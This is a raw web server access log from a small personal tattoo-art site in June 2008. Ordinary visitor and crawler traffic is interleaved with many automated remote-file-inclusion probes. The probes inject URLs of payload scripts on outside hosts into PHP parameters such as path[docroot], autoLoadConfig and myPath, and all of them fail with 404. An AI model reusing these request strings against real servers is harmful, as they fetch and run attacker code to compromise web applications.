62.2.100.138 - - [08/Jun/2008:00:46:04 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:00:46:04 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:00:46:05 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
72.52.136.89 - - [08/Jun/2008:00:48:24 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
72.52.136.89 - - [08/Jun/2008:00:48:25 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
72.52.136.89 - - [08/Jun/2008:00:48:25 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
68.76.31.154 - - [08/Jun/2008:00:49:59 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
209.200.229.186 - - [08/Jun/2008:00:50:22 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
209.200.229.186 - - [08/Jun/2008:00:50:22 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
209.200.229.186 - - [08/Jun/2008:00:50:22 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
68.76.31.154 - - [08/Jun/2008:00:52:08 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:00:52:08 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
65.55.208.123 - - [08/Jun/2008:00:52:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [08/Jun/2008:00:52:24 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.2.100.138 - - [08/Jun/2008:00:52:47 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:00:52:48 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:00:52:48 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
216.167.156.20 - - [08/Jun/2008:00:54:03 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
216.167.156.20 - - [08/Jun/2008:00:54:07 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
216.167.156.20 - - [08/Jun/2008:00:58:40 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
216.167.156.20 - - [08/Jun/2008:00:58:40 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
68.76.31.154 - - [08/Jun/2008:01:02:10 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:01:02:10 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:01:02:10 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:01:04:07 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:01:04:07 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:01:08:59 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:01:09:02 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
98.208.204.244 - - [08/Jun/2008:01:10:23 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=364&w=405&sz=67&hl=en&start=476&sig2=tY3y0PJmvhl222qixuZVMQ&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&ei=WnVLSO-vEIW6epH-pNAE&prev=/images%3Fq%3Dtattoo%2Bflash%26start%3D468%26gbv%3D2%26ndsp%3D18%26hl%3Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26sa%3DN""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:23 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:24 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:24 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:24 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:24 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:55 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:55 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:55 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:55 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:55 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:56 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:56 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:56 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
98.208.204.244 - - [08/Jun/2008:01:10:56 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.22.166 - - [08/Jun/2008:01:11:59 -0500] "GET /artwork/ HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.173.115 - - [08/Jun/2008:01:12:10 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
89.111.173.115 - - [08/Jun/2008:01:12:10 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
74.6.22.166 - - [08/Jun/2008:01:18:26 -0500] "GET /?D=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.167.156.20 - - [08/Jun/2008:01:22:09 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
216.167.156.20 - - [08/Jun/2008:01:22:09 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
216.167.156.20 - - [08/Jun/2008:01:22:09 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
69.13.233.174 - - [08/Jun/2008:01:25:50 -0500] "GET /logs/access_log.1181952000//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
69.13.233.174 - - [08/Jun/2008:01:25:50 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
69.13.233.174 - - [08/Jun/2008:01:25:51 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
69.13.233.174 - - [08/Jun/2008:01:25:53 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
195.54.9.218 - - [08/Jun/2008:01:28:51 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
195.54.9.218 - - [08/Jun/2008:01:28:52 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
65.55.208.120 - - [08/Jun/2008:01:29:47 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.18.50 - - [08/Jun/2008:01:41:15 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.to-excess.de/mh/language/lang_german/mic22.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.106.18.50 - - [08/Jun/2008:01:41:15 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.to-excess.de/mh/language/lang_german/mic22.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
62.128.131.80 - - [08/Jun/2008:01:47:51 -0500] "GET /logs/db.php?path_local=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
62.128.131.80 - - [08/Jun/2008:01:47:51 -0500] "GET /db.php?path_local=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
76.223.245.112 - - [08/Jun/2008:01:55:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DKUS,DKUS:2006-34,DKUS:en&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
76.223.245.112 - - [08/Jun/2008:01:55:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
76.223.245.112 - - [08/Jun/2008:01:55:52 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
65.55.208.125 - - [08/Jun/2008:02:01:43 -0500] "GET /logs/access_log.1203206400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [08/Jun/2008:02:01:44 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [08/Jun/2008:02:01:44 -0500] "GET /logs/access_log.1182643200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.22.166 - - [08/Jun/2008:02:03:11 -0500] "GET /logs/access_log.1164067200 HTTP/1.0" 200 193981 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.166 - - [08/Jun/2008:02:13:08 -0500] "GET /logs/access_log.1176249600 HTTP/1.0" 200 231534 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.72.170 - - [08/Jun/2008:02:16:18 -0500] "GET /logs/errors.php/errors.php?error=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
62.44.72.170 - - [08/Jun/2008:02:16:19 -0500] "GET /errors.php/errors.php?error=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
216.75.35.118 - - [08/Jun/2008:02:16:41 -0500] "GET /logs//header.php?prefix=http://www.delcorso.org/images/inc.png?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.75.35.118 - - [08/Jun/2008:02:16:41 -0500] "GET //header.php?prefix=http://www.delcorso.org/images/inc.png?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.218.234.146 - - [08/Jun/2008:02:18:02 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.218.234.146 - - [08/Jun/2008:02:18:02 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.15.135.118 - - [08/Jun/2008:02:18:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.135.118 - - [08/Jun/2008:02:18:06 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
75.126.196.16 - - [08/Jun/2008:02:18:17 -0500] "GET /logs/errors.php/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
75.126.196.16 - - [08/Jun/2008:02:18:17 -0500] "GET /errors.php/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
203.98.181.34 - - [08/Jun/2008:02:19:03 -0500] "GET /logs/errors.php/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
203.98.181.34 - - [08/Jun/2008:02:19:03 -0500] "GET /errors.php/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
87.101.4.42 - - [08/Jun/2008:02:19:45 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.101.4.42 - - [08/Jun/2008:02:19:46 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tdepk.ru/guest/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.106.37.86 - - [08/Jun/2008:02:20:11 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.37.86 - - [08/Jun/2008:02:20:12 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.190.212.202 - - [08/Jun/2008:02:20:40 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.190.212.202 - - [08/Jun/2008:02:20:40 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.194.67.215 - - [08/Jun/2008:02:23:38 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
216.194.67.215 - - [08/Jun/2008:02:23:38 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
72.29.77.72 - - [08/Jun/2008:02:28:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
72.29.77.72 - - [08/Jun/2008:02:28:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
72.29.77.72 - - [08/Jun/2008:02:28:43 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
72.29.77.72 - - [08/Jun/2008:02:28:44 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
82.75.250.41 - - [08/Jun/2008:02:29:07 -0500] "GET /logs//errors.php?error=http://geocities.com/dayak_ibant/tol.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
82.75.250.41 - - [08/Jun/2008:02:29:08 -0500] "GET //errors.php?error=http://geocities.com/dayak_ibant/tol.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
62.128.131.80 - - [08/Jun/2008:02:29:23 -0500] "GET /logs/access_log.1204156800//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
62.128.131.80 - - [08/Jun/2008:02:29:26 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
62.128.131.80 - - [08/Jun/2008:02:29:26 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
74.6.22.166 - - [08/Jun/2008:02:30:29 -0500] "GET /logs/access_log.1166572800 HTTP/1.0" 200 194252 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.194.67.215 - - [08/Jun/2008:02:37:15 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
65.55.208.121 - - [08/Jun/2008:02:37:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [08/Jun/2008:02:37:27 -0500] "GET /?D=A HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.214.44.28 - - [08/Jun/2008:02:42:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [08/Jun/2008:02:42:06 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:06 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:06 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:06 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:06 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:07 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:07 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:07 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:07 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:07 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [08/Jun/2008:02:42:07 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
203.98.181.34 - - [08/Jun/2008:02:45:00 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
203.98.181.34 - - [08/Jun/2008:02:45:00 -0500] "GET //skin/zero_vote/error.php?dir=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
87.230.18.192 - - [08/Jun/2008:02:45:54 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.230.18.192 - - [08/Jun/2008:02:45:54 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.team-nds.de/includes/rfi-response.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
216.194.67.215 - - [08/Jun/2008:02:46:21 -0500] "GET /logs/access_log.1203638400//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
216.194.67.215 - - [08/Jun/2008:02:46:21 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
216.194.67.215 - - [08/Jun/2008:02:46:21 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
